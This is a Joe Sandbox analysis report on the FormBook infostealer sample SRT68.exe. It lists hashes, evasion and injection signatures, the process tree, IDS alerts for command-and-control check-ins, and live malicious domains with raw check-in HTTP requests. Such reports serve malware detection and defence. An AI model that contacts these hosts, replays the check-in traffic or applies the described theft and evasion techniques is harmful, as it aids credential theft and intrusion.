Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SRT68.exe

Overview

General Information

Sample name:SRT68.exe
Analysis ID:1568958
MD5:71829b1e3a8cc54976390920f8c9282b
SHA1:60777574082f65fa3436acd404fcec9fe8dd4c80
SHA256:feaa7b0c24315f2516cc912f47bf1dce6cef3f007ccf05f94b0214ecdf255b3d
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Child Process Spawned By Odbcconf.EXE
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SRT68.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\SRT68.exe" MD5: 71829B1E3A8CC54976390920F8C9282B)
    • svchost.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\SRT68.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VdxisCThGA.exe (PID: 6040 cmdline: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • odbcconf.exe (PID: 7552 cmdline: "C:\Windows\SysWOW64\odbcconf.exe" MD5: D567FFF92055255DBE43BF8F989A4B7E)
          • VdxisCThGA.exe (PID: 5952 cmdline: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7888 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Harjot Singh @cyb3rjy0t: Data: Command: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , CommandLine: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, NewProcessName: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, OriginalFileName: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe, ParentCommandLine: "C:\Windows\SysWOW64\odbcconf.exe", ParentImage: C:\Windows\SysWOW64\odbcconf.exe, ParentProcessId: 7552, ParentProcessName: odbcconf.exe, ProcessCommandLine: "C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe" , ProcessId: 5952, ProcessName: VdxisCThGA.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SRT68.exe", CommandLine: "C:\Users\user\Desktop\SRT68.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SRT68.exe", ParentImage: C:\Users\user\Desktop\SRT68.exe, ParentProcessId: 7440, ParentProcessName: SRT68.exe, ProcessCommandLine: "C:\Users\user\Desktop\SRT68.exe", ProcessId: 7496, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SRT68.exe", CommandLine: "C:\Users\user\Desktop\SRT68.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SRT68.exe", ParentImage: C:\Users\user\Desktop\SRT68.exe, ParentProcessId: 7440, ParentProcessName: SRT68.exe, ProcessCommandLine: "C:\Users\user\Desktop\SRT68.exe", ProcessId: 7496, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-05T09:43:27.768718+010020507451Malware Command and Control Activity Detected192.168.2.84970881.2.196.1980TCP
                2024-12-05T09:43:53.418925+010020507451Malware Command and Control Activity Detected192.168.2.849712103.249.106.9180TCP
                2024-12-05T09:44:08.368003+010020507451Malware Command and Control Activity Detected192.168.2.84971713.248.169.4880TCP
                2024-12-05T09:44:23.579928+010020507451Malware Command and Control Activity Detected192.168.2.849721195.110.124.13380TCP
                2024-12-05T09:44:38.396713+010020507451Malware Command and Control Activity Detected192.168.2.849725209.74.77.10780TCP
                2024-12-05T09:44:53.167690+010020507451Malware Command and Control Activity Detected192.168.2.84972984.32.84.3280TCP
                2024-12-05T09:45:08.519235+010020507451Malware Command and Control Activity Detected192.168.2.849733154.88.22.10580TCP
                2024-12-05T09:45:23.962628+010020507451Malware Command and Control Activity Detected192.168.2.84973785.159.66.9380TCP
                2024-12-05T09:45:38.915975+010020507451Malware Command and Control Activity Detected192.168.2.849741199.59.243.22780TCP
                2024-12-05T09:45:53.979627+010020507451Malware Command and Control Activity Detected192.168.2.84974591.226.30.380TCP
                2024-12-05T09:46:08.717861+010020507451Malware Command and Control Activity Detected192.168.2.84974913.248.169.4880TCP
                2024-12-05T09:46:23.882892+010020507451Malware Command and Control Activity Detected192.168.2.849753185.27.134.14480TCP
                2024-12-05T09:46:39.481719+010020507451Malware Command and Control Activity Detected192.168.2.84975785.159.66.9380TCP
                2024-12-05T09:46:54.675852+010020507451Malware Command and Control Activity Detected192.168.2.849761154.23.184.20780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.appsolucao.shop/qize/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/pxvi/Avira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHgAvira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHgAvira URL Cloud: Label: malware
                Source: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6MEAvira URL Cloud: Label: malware
                Source: appsolucao.shopVirustotal: Detection: 10%Perma Link
                Source: SRT68.exeReversingLabs: Detection: 50%
                Source: SRT68.exeVirustotal: Detection: 32%Perma Link
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: SRT68.exeJoe Sandbox ML: detected
                Source: SRT68.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VdxisCThGA.exe, 00000003.00000000.1410310417.000000000030E000.00000002.00000001.01000000.00000004.sdmp, VdxisCThGA.exe, 00000006.00000000.1569343495.000000000030E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: odbcconf.pdb source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: odbcconf.pdbGCTL source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EEC6C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02EEC6C0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4x nop then xor eax, eax4_2_02ED9EC0
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4x nop then mov ebx, 00000004h4_2_04CA04EA

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49721 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49708 -> 81.2.196.19:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49717 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 154.88.22.105:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 91.226.30.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49712 -> 103.249.106.91:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 85.159.66.93:80
                Source: DNS query: www.8600228.xyz
                Source: DNS query: www.avalanchefi.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010122EE
                Source: global trafficHTTP traffic detected: GET /zzs5/?t8=erepa0aHg&dpy4vDKP=S2OsCDyvlLRi8QWYXg1pYm60P988fDuoEbyrPuxNzPrnmbTjDj97FaXU9n32cQowhVlW8PNou7nXPbuRJkerLzsl2XtEg5/IjfyZCmafOy2/D+uD8ZFJuIO6v1d/wwnCHw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bagatowcannabis.cloudConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.8600228.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.remedies.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /io9k/?dpy4vDKP=JSfqOM1hntmKPRX8QapMCMaojpQJWGU7F5uIf0M4pwAd1rq+GgCVpaF7coK3O/ojAayWDC1AXCc++TdMJ3it9pzzLzylaJ3SA3sw8PdpX1afK4k48hvBTosEFJxP8txHbg==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.liveplah.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cg19g5.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kuyubak.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                Source: global trafficHTTP traffic detected: GET /9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.acond-22-mvr.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
